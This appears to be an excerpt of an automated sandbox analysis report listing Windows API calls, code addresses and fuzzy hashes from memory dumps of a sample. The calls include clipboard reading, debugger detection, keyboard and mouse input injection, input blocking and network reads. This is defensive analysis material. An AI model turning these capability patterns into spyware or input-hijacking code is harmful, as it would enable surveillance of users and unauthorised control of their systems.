          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
          • API String ID: 0-2872873767
          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
          • Sleep.KERNEL32(0000000A), ref: 0045250B
          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
          • FindClose.KERNEL32(?), ref: 004525FF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
          • String ID: *.*$\VH
          • API String ID: 2786137511-2657498754
          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
          APIs
          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00421FD6
          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
          • TerminateProcess.KERNEL32(00000000), ref: 00422004
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
          • String ID: pqI
          • API String ID: 2579439406-2459173057
          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
          APIs
          • OleInitialize.OLE32(00000000), ref: 0046CF63
          • _wcslen.LIBCMT ref: 0046CF75
          • CreateBindCtx.OLE32(00000000,?), ref: 0046D01F
          • MkParseDisplayName.OLE32(?,?,?,?), ref: 0046D065
            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046D10B
          • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0046D125
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
          • String ID:
          • API String ID: 2728119192-0
          • Opcode ID: 68f896165689c60a77b15e348e9bcd14568464d5554ec5ac4c2887339c93c3d6
          • Instruction ID: 654cbfa1d8fefa06abeba6563afdd6e3d5f820db169d2b444807b365abf91408
          • Opcode Fuzzy Hash: 68f896165689c60a77b15e348e9bcd14568464d5554ec5ac4c2887339c93c3d6
          • Instruction Fuzzy Hash: 3D815E71604301ABD700EF65DC85F6BB3E8BF88704F10491EF64597291E775E905CB6A
          APIs
          • __wcsicoll.LIBCMT ref: 00433349
          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
          • __wcsicoll.LIBCMT ref: 00433375
          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsicollmouse_event
          • String ID: DOWN
          • API String ID: 1033544147-711622031
          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
          APIs
          • GetKeyboardState.USER32(?), ref: 0044C3D2
          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
          • PostMessageW.USER32 ref: 0044C43A
          • PostMessageW.USER32 ref: 0044C472
          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: KeyboardMessagePostState$InputSend
          • String ID:
          • API String ID: 3031425849-0
          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
          APIs
            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorLastinet_addrsocket
          • String ID:
          • API String ID: 4170576061-0
          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
          APIs
            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
          • IsWindowVisible.USER32 ref: 0047A368
          • IsWindowEnabled.USER32 ref: 0047A378
          • GetForegroundWindow.USER32 ref: 0047A385
          • IsIconic.USER32 ref: 0047A393
          • IsZoomed.USER32 ref: 0047A3A1
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$EnabledForegroundIconicVisibleZoomed
          • String ID:
          • API String ID: 292994002-0
          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
          APIs
          • OpenClipboard.USER32(?), ref: 0046DCE7
          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
          • GetClipboardData.USER32 ref: 0046DD01
          • CloseClipboard.USER32 ref: 0046DD0D
          • GlobalLock.KERNEL32 ref: 0046DD37
          • CloseClipboard.USER32 ref: 0046DD41
          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
          • GetClipboardData.USER32 ref: 0046DD8D
          • CloseClipboard.USER32 ref: 0046DD99
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
          • String ID:
          • API String ID: 15083398-0
          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 805adc2059bf501b1fa7be94bd771afe84ede2009410d8cfdb1e23709f1c8037
          • Instruction ID: c9675114c6ec2fd72297f2377e71b357c10be6b45234191c4e6a35d7edb1fe2e
          • Opcode Fuzzy Hash: 805adc2059bf501b1fa7be94bd771afe84ede2009410d8cfdb1e23709f1c8037
          • Instruction Fuzzy Hash: 1BF1A470D006498FEF24CFA9C4802AEFBF2FF85314F2882AAD455AB345D375A946CB55
          APIs
          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Find$File$CloseFirstNext
          • String ID:
          • API String ID: 3541575487-0
          • Opcode ID: a5d6f593495b20b5e83044291925fe9169d98ca26f891baa83e7b9c75bfe9756
          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
          • Opcode Fuzzy Hash: a5d6f593495b20b5e83044291925fe9169d98ca26f891baa83e7b9c75bfe9756
          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
          APIs
          • __time64.LIBCMT ref: 00442E1E
            • Part of subcall function 004148B3: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00430E3E,00000000,?,?,00441E36,?,00000001), ref: 004148BE
            • Part of subcall function 004148B3: __aulldiv.LIBCMT ref: 004148DE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Time$FileSystem__aulldiv__time64
          • String ID: @uJ
          • API String ID: 2893107130-1268412911
          • Opcode ID: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
          • Instruction ID: d38707ff02ce459d0d249ce09c4ef886a5fe37698b82f7f0427e65daa233e585
          • Opcode Fuzzy Hash: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
          • Instruction Fuzzy Hash: CB21A2335605108BF320CF37CC01652B7E7EBE5310F358A69E4A5973D1DAB96906CB98
          APIs
          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Internet$AvailableDataErrorFileLastQueryRead
          • String ID:
          • API String ID: 901099227-0
          • Opcode ID: 2766dd017a35a582f281a5a962d2d1cd72be87eede06af1684fc2a386cf4a680
          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
          • Opcode Fuzzy Hash: 2766dd017a35a582f281a5a962d2d1cd72be87eede06af1684fc2a386cf4a680
          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
          APIs
          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DEB4
          • FindClose.KERNEL32(00000000), ref: 0045DEF0
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Find$CloseFileFirst
          • String ID:
          • API String ID: 2295610775-0
          • Opcode ID: fa8284a9ded648ffea22647615070995beef9130508a8479dbfd4b77e5f7619d
          • Instruction ID: 87eaadf29b8e191e1ea341be1384c57ecbaef0316c3fc1e5a02930af3baeb018
          • Opcode Fuzzy Hash: fa8284a9ded648ffea22647615070995beef9130508a8479dbfd4b77e5f7619d
          • Instruction Fuzzy Hash: 5C11E5726002049FD310EF6ADC49A5AF7E9FF84325F10C92EF998DB281DB74E8448B94
          APIs
          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AF9D
          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AFB6
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorFormatLastMessage
          • String ID:
          • API String ID: 3479602957-0
          • Opcode ID: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
          • Instruction ID: 34579116b05a7082732a3a1f7365c6d8fd3edd81a632b3ed1e6c87f0e426309d
          • Opcode Fuzzy Hash: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
          • Instruction Fuzzy Hash: 57F0B4712503186AFB24AB58DC49FBAB36CEF44711F0046AAF504971D1D6F07D40C7A9
          APIs
          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Proc
          • String ID:
          • API String ID: 2346855178-0
          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: BlockInput
          • String ID:
          • API String ID: 3456056419-0
          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
